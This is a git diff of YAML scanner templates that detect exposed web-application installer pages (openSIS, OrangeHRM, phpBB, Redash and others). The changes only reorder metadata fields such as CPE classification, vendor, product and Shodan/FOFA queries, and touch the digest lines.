--- a/http/misconfiguration/installer/opensis-installer.yaml
+++ b/http/misconfiguration/installer/opensis-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: openSIS is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"openSIS"
- product: opensis
vendor: os4ed
+ product: opensis
+ shodan-query: title:"openSIS"
tags: misconfig,opensis,install,exposure
- classification:
- cpe: cpe:2.3:a:os4ed:opensis:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502207286a677ed21cd6471387391d1d2b058872b3e2dfa2697e637563adebf3f8b660221009bacfdc9368fdeffc8a6478837f8959f05d6f8bc56065aeb59e65b6dfbee8851:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502207286a677ed21cd6471387391d1d2b058872b3e2dfa2697e637563adebf3f8b660221009bacfdc9368fdeffc8a6478837f8959f05d6f8bc56065aeb59e65b6dfbee8851:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/orangehrm-installer.yaml b/http/misconfiguration/installer/orangehrm-installer.yaml
index 62fa65eafb..3fcd57e604 100644
--- a/http/misconfiguration/installer/orangehrm-installer.yaml
+++ b/http/misconfiguration/installer/orangehrm-installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: high
description: OrangeHrm is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:orangehrm:orangehrm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"OrangeHRM Web Installation Wizard"
- product: orangehrm
vendor: orangehrm
+ product: orangehrm
+ shodan-query: http.title:"OrangeHRM Web Installation Wizard"
tags: misconfig,exposure,install,orangehrm
- classification:
- cpe: cpe:2.3:a:orangehrm:orangehrm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100de5cdc54a739f1ecb3c6109c731d472175baaa0f6a7368617da7c527f7518d9902200f1c925005e091baa368e4a91875d1b0ff186b7ff861be917db186e20546010d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100de5cdc54a739f1ecb3c6109c731d472175baaa0f6a7368617da7c527f7518d9902200f1c925005e091baa368e4a91875d1b0ff186b7ff861be917db186e20546010d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/orangescrum-install.yaml b/http/misconfiguration/installer/orangescrum-install.yaml
index b78c5d8d0d..c8fa4ec32f 100644
--- a/http/misconfiguration/installer/orangescrum-install.yaml
+++ b/http/misconfiguration/installer/orangescrum-install.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Orangescrum is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:orangescrum:orangescrum:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Orangescrum Setup Wizard"
- product: orangescrum
vendor: orangescrum
+ product: orangescrum
+ shodan-query: title:"Orangescrum Setup Wizard"
tags: misconfig,orangescrum,install
- classification:
- cpe: cpe:2.3:a:orangescrum:orangescrum:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml
index 6ce153ec4b..4894bfb757 100644
--- a/http/misconfiguration/installer/orchard-installer.yaml
+++ b/http/misconfiguration/installer/orchard-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Orchard is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:orchardproject:orchard:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Orchard Setup - Get Started"
- product: orchard
vendor: orchardproject
+ product: orchard
+ shodan-query: html:"Orchard Setup - Get Started"
tags: misconfig,exposure,install,orchard
- classification:
- cpe: cpe:2.3:a:orchardproject:orchard:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/owncloud-installer-exposure.yaml b/http/misconfiguration/installer/owncloud-installer-exposure.yaml
index 21579a6bf9..2aa001f24e 100644
--- a/http/misconfiguration/installer/owncloud-installer-exposure.yaml
+++ b/http/misconfiguration/installer/owncloud-installer-exposure.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: OwnCloud is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"owncloud"
- product: owncloud
vendor: owncloud
+ product: owncloud
+ shodan-query: title:"owncloud"
tags: misconfig,owncloud,exposure,install
- classification:
- cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206c51b290ea4f0c4547ea5dd2370b29889e8c0105de44f20cfce4e3cec2825f4102206c4cc3755344812222a95c7596b92586525488047be86c030757b0b99c434e4f:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402206c51b290ea4f0c4547ea5dd2370b29889e8c0105de44f20cfce4e3cec2825f4102206c4cc3755344812222a95c7596b92586525488047be86c030757b0b99c434e4f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/oxid-eshop-installer.yaml b/http/misconfiguration/installer/oxid-eshop-installer.yaml
index d18ecc6787..2772a39c26 100644
--- a/http/misconfiguration/installer/oxid-eshop-installer.yaml
+++ b/http/misconfiguration/installer/oxid-eshop-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Oxid EShop is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"OXID eShop installation"
- product: eshop
vendor: oxid-esales
+ product: eshop
+ shodan-query: title:"OXID eShop installation"
tags: misconfig,oxid,eshop,install,exposure
- classification:
- cpe: cpe:2.3:a:oxid-esales:eshop:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f6d13f67c47d1727a0a5a423b32f7b4459c40ca4298e8205d0e8aa1494091cdd02210098ee4164fa72dacf08cdc735297af64aa274e73054efa51adb4bc9bf21b5ead3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f6d13f67c47d1727a0a5a423b32f7b4459c40ca4298e8205d0e8aa1494091cdd02210098ee4164fa72dacf08cdc735297af64aa274e73054efa51adb4bc9bf21b5ead3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/pagekit-installer.yaml b/http/misconfiguration/installer/pagekit-installer.yaml
index c40ec24d36..856fa8bb70 100644
--- a/http/misconfiguration/installer/pagekit-installer.yaml
+++ b/http/misconfiguration/installer/pagekit-installer.yaml
@@ -7,16 +7,16 @@ info:
description: Pagekit is susceptible to the Installation page exposure due to misconfiguration.
reference:
- https://github.com/pagekit/pagekit
+ classification:
+ cpe: cpe:2.3:a:pagekit:pagekit:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Pagekit Installer"
- product: pagekit
vendor: pagekit
+ product: pagekit
+ shodan-query: title:"Pagekit Installer"
tags: misconfig,pagekit,install,exposure
- classification:
- cpe: cpe:2.3:a:pagekit:pagekit:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100acdc3214fb55521959de012b7c14c0dd5b3afd9fdf7c37ce15bb3127881c368a0220406c6e133039e22f73a5d297bfa835190899a845f8b6191b2ba29231ebf80ceb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100acdc3214fb55521959de012b7c14c0dd5b3afd9fdf7c37ce15bb3127881c368a0220406c6e133039e22f73a5d297bfa835190899a845f8b6191b2ba29231ebf80ceb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml
index fca795cd71..c3b5f5bcb8 100644
--- a/http/misconfiguration/installer/pandora-fms-installer.yaml
+++ b/http/misconfiguration/installer/pandora-fms-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed Pandora FMS installation page.
reference:
- https://pandorafms.com/en/
+ classification:
+ cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="Pandora FMS - Installation Wizard"
- product: pandora_fms
vendor: pandorafms
+ product: pandora_fms
+ fofa-query: body="Pandora FMS - Installation Wizard"
tags: misconfig,install,exposure,pandora-fms
- classification:
- cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/permissions-installer.yaml b/http/misconfiguration/installer/permissions-installer.yaml
index 7120742045..dece072ce2 100644
--- a/http/misconfiguration/installer/permissions-installer.yaml
+++ b/http/misconfiguration/installer/permissions-installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: high
description: Permissions Installer is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:suse:permissions:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:" Permissions | Installer"
- product: permissions
vendor: suse
+ product: permissions
+ shodan-query: title:" Permissions | Installer"
tags: misconfig,permissions,install,exposure
- classification:
- cpe: cpe:2.3:a:suse:permissions:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ce20244086b4d44e96b0e4b2e608e20a212e7cb59a227ad8fa29926711e33612022072f3f53f63a25d55496eaea3aa2be1c131696b653d64ca4807d41e38a570b0d9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ce20244086b4d44e96b0e4b2e608e20a212e7cb59a227ad8fa29926711e33612022072f3f53f63a25d55496eaea3aa2be1c131696b653d64ca4807d41e38a570b0d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/phpbb-installer.yaml b/http/misconfiguration/installer/phpbb-installer.yaml
index ccf22d4876..afded9361d 100644
--- a/http/misconfiguration/installer/phpbb-installer.yaml
+++ b/http/misconfiguration/installer/phpbb-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: phpBB is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Installation Panel"
- product: phpbb
vendor: phpbb
+ product: phpbb
+ shodan-query: html:"Installation Panel"
tags: misconfig,phpbb,install,exposure
- classification:
- cpe: cpe:2.3:a:phpbb:phpbb:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210087fc262cb360c9c8d8ee8da1a080617dea1385586bba8aeb2a25a099d9c5c55302210082fe0a042af08356fbfce93605835806ccdd1243e311d1db0318a52a9c80bbdd:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210087fc262cb360c9c8d8ee8da1a080617dea1385586bba8aeb2a25a099d9c5c55302210082fe0a042af08356fbfce93605835806ccdd1243e311d1db0318a52a9c80bbdd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/phpgedview-installer.yaml b/http/misconfiguration/installer/phpgedview-installer.yaml
index 8f1994632a..521730d1c2 100644
--- a/http/misconfiguration/installer/phpgedview-installer.yaml
+++ b/http/misconfiguration/installer/phpgedview-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: PhpGedView is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:phpgedview:phpgedview:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"/phpgedview.db"
- product: phpgedview
vendor: phpgedview
+ product: phpgedview
+ shodan-query: html:"/phpgedview.db"
tags: misconfig,phpgedview,install,exposure
- classification:
- cpe: cpe:2.3:a:phpgedview:phpgedview:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/phpipam-installer.yaml b/http/misconfiguration/installer/phpipam-installer.yaml
index c5ded7e750..f542c176a6 100644
--- a/http/misconfiguration/installer/phpipam-installer.yaml
+++ b/http/misconfiguration/installer/phpipam-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
PHP IPAM is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"phpipam installation wizard"
- product: phpipam
vendor: phpipam
+ product: phpipam
+ shodan-query: html:"phpipam installation wizard"
tags: misconfig,exposure,install,phpipam
- classification:
- cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ad58e4bdb9ab9f2cf7c89e9710d2b31b5c4a00e8536ee1d1d133a4249cb8d5ce0220464eec521102934eebfca522811ee5bd2d0a34c5d3b2b2a70f707c776a32c9dc:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ad58e4bdb9ab9f2cf7c89e9710d2b31b5c4a00e8536ee1d1d133a4249cb8d5ce0220464eec521102934eebfca522811ee5bd2d0a34c5d3b2b2a70f707c776a32c9dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/phpmyfaq-installer.yaml b/http/misconfiguration/installer/phpmyfaq-installer.yaml
index a91d92aec4..e3ca679fa8 100644
--- a/http/misconfiguration/installer/phpmyfaq-installer.yaml
+++ b/http/misconfiguration/installer/phpmyfaq-installer.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: phpMyFAQ installation is exposed.
+ classification:
+ cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: "phpMyFAQ-setup"
- product: phpmyfaq
vendor: phpmyfaq
+ product: phpmyfaq
+ fofa-query: "phpMyFAQ-setup"
tags: misconfig,phpmyfaq,install
- classification:
- cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
part: header
words:
- 'phpmyfaq-setup'
-# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402201791f7ef0c860c7e565d6b7f79b3552d97890f2ef5a32e3ea9e1e83e8e05dc7f022000ceca0e611b72fd804a249e967c96b9d9762df4abcd70c1de5cf4aaeece0423:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/phpwind-installer.yaml b/http/misconfiguration/installer/phpwind-installer.yaml
index 938049e536..514dd6bb05 100644
--- a/http/misconfiguration/installer/phpwind-installer.yaml
+++ b/http/misconfiguration/installer/phpwind-installer.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: high
description: phpwind is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:phpwind:phpwind:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Powered by phpwind"
- product: phpwind
vendor: phpwind
+ product: phpwind
+ shodan-query: title:"Powered by phpwind"
tags: misconfig,phpwind,exposure,install
- classification:
- cpe: cpe:2.3:a:phpwind:phpwind:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210083cf74f4b0597c70df0689a90bc8c49c0fa4b549b6e30674e56251994ab97f220221008ccbf5fdf5d0ffdf830351a5f6e3ceffacbd13f2cc3120323b48a9d79ef7c119:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210083cf74f4b0597c70df0689a90bc8c49c0fa4b549b6e30674e56251994ab97f220221008ccbf5fdf5d0ffdf830351a5f6e3ceffacbd13f2cc3120323b48a9d79ef7c119:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml
index 4a1a23aacb..13e6575a23 100644
--- a/http/misconfiguration/installer/piwigo-installer.yaml
+++ b/http/misconfiguration/installer/piwigo-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Piwigo is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Piwigo" html:"- Installation"
- product: piwigo
vendor: piwigo
+ product: piwigo
+ shodan-query: html:"Piwigo" html:"- Installation"
tags: misconfig,exposure,install,piwigo
- classification:
- cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100eeddac8af33ba19fd2bfab6bbd54b0161f3c93e0247010be93bceee0da5c140402207100dd147f60943aaa53e1183e09e7886871302d663be5d0b0dcb97c7b9f11fa:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100eeddac8af33ba19fd2bfab6bbd54b0161f3c93e0247010be93bceee0da5c140402207100dd147f60943aaa53e1183e09e7886871302d663be5d0b0dcb97c7b9f11fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/pmm-installer.yaml b/http/misconfiguration/installer/pmm-installer.yaml
index 02f5332d29..15f45a2a02 100644
--- a/http/misconfiguration/installer/pmm-installer.yaml
+++ b/http/misconfiguration/installer/pmm-installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: high
description: PMM is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:percona:monitoring_and_management:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"PMM Installation Wizard"
- product: monitoring_and_management
vendor: percona
+ product: monitoring_and_management
+ shodan-query: http.title:"PMM Installation Wizard"
tags: misconfig,exposure,install,pmm
- classification:
- cpe: cpe:2.3:a:percona:monitoring_and_management:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e17140e1a9563e94bf1baead9a092319666bf36480dffafa9a21a63b9fcdb391022100c03f393fedc23e1b9eb11a2b1596fbec8332f45bbeb496c84d76dbbfc7f214a4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e17140e1a9563e94bf1baead9a092319666bf36480dffafa9a21a63b9fcdb391022100c03f393fedc23e1b9eb11a2b1596fbec8332f45bbeb496c84d76dbbfc7f214a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/poste-io-installer.yaml b/http/misconfiguration/installer/poste-io-installer.yaml
index ac092b87cc..89f3a3d40c 100644
--- a/http/misconfiguration/installer/poste-io-installer.yaml
+++ b/http/misconfiguration/installer/poste-io-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Poste.io is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="Initial server configuration"
- product: poste.io
vendor: analogic
+ product: poste.io
+ fofa-query: body="Initial server configuration"
tags: misconfig,exposure,poste-io,install
- classification:
- cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100da8af244ae67997355b3d9c3f502fd2f07889bc87e33b42656b83d9551a1e3a1022074bebb13f7565d53bf8bac225bad94cb311502f85a7849a721d369ef0176de6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/prestashop-installer.yaml b/http/misconfiguration/installer/prestashop-installer.yaml
index e66944616e..797827dc63 100644
--- a/http/misconfiguration/installer/prestashop-installer.yaml
+++ b/http/misconfiguration/installer/prestashop-installer.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: high
description: Prestashop is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"PrestaShop Installation Assistant"
- product: prestashop
vendor: prestashop
+ product: prestashop
+ shodan-query: title:"PrestaShop Installation Assistant"
tags: misconfig,prestashop,exposure,install
- classification:
- cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100a30533126e8bda3720627039bfd0a31e2f2bbd17cc62c347b3ddbf8acbf870970220314eed5d5caf09735ef9d5d9c106f5311ffba5d158bc5777b5cd8bcd62903801:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a30533126e8bda3720627039bfd0a31e2f2bbd17cc62c347b3ddbf8acbf870970220314eed5d5caf09735ef9d5d9c106f5311ffba5d158bc5777b5cd8bcd62903801:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/processwire-installer.yaml b/http/misconfiguration/installer/processwire-installer.yaml
index 5d82234006..2fc1c386df 100644
--- a/http/misconfiguration/installer/processwire-installer.yaml
+++ b/http/misconfiguration/installer/processwire-installer.yaml
@@ -5,16 +5,16 @@ info:
author: pussycat0x
severity: unknown
description: ProcessWire 3.x is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"ProcessWire 3.x Installer"
- product: processwire
vendor: processwire
+ product: processwire
+ shodan-query: title:"ProcessWire 3.x Installer"
tags: misconfig,processwire,install,exposure
- classification:
- cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c9040333d464ee74f38bb8f6bf7f9ebce6d974486b7350ee3cad1e01ac28f9d702205d65792631cf1873f7669e346c45e7bc7e29e2ded46d3f11fe0847a25cac5801:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c9040333d464ee74f38bb8f6bf7f9ebce6d974486b7350ee3cad1e01ac28f9d702205d65792631cf1873f7669e346c45e7bc7e29e2ded46d3f11fe0847a25cac5801:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml
index f7766545bd..660c425038 100644
--- a/http/misconfiguration/installer/projectsend-installer.yaml
+++ b/http/misconfiguration/installer/projectsend-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed ProjectSend installation page.
reference:
- https://www.projectsend.org/
+ classification:
+ cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"ProjectSend setup"
- product: projectsend
vendor: projectsend
+ product: projectsend
+ shodan-query: html:"ProjectSend setup"
tags: misconfig,install,exposure,projectsend
- classification:
- cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,6 +25,7 @@ http:
- "{{BaseURL}}/install/make-config.php"
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -35,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022041d7f7b7fc7194bc9ecab9aec4682b69587b2a03b9dcebf694cfd9e85688754202206bdf942b3342aebf617db7fabc9e276da0cebb2f27a5e585310e85b9ac04210f:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022041d7f7b7fc7194bc9ecab9aec4682b69587b2a03b9dcebf694cfd9e85688754202206bdf942b3342aebf617db7fabc9e276da0cebb2f27a5e585310e85b9ac04210f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml
index 935753ea65..c31ed96876 100644
--- a/http/misconfiguration/installer/qloapps-installer.yaml
+++ b/http/misconfiguration/installer/qloapps-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
QloApps Installation Assistant panel exposure.
+ classification:
+ cpe: cpe:2.3:a:webkul:qloapps:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="QloApps Installation"
- product: qloapps
vendor: webkul
+ product: qloapps
+ fofa-query: title="QloApps Installation"
tags: install,qloapps,misconfig,exposure
- classification:
- cpe: cpe:2.3:a:webkul:qloapps:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -23,6 +23,7 @@ http:
host-redirects: true
max-redirects: 2
+
matchers-condition: and
matchers:
- type: word
@@ -34,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/redash-installer.yaml b/http/misconfiguration/installer/redash-installer.yaml
index a5b987353b..f5b5d6814d 100644
--- a/http/misconfiguration/installer/redash-installer.yaml
+++ b/http/misconfiguration/installer/redash-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Redash is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Redash Initial Setup"
- product: redash
vendor: redash
+ product: redash
+ shodan-query: html:"Redash Initial Setup"
tags: misconfig,redash,install
- classification:
- cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
http:
- method: GET
path:
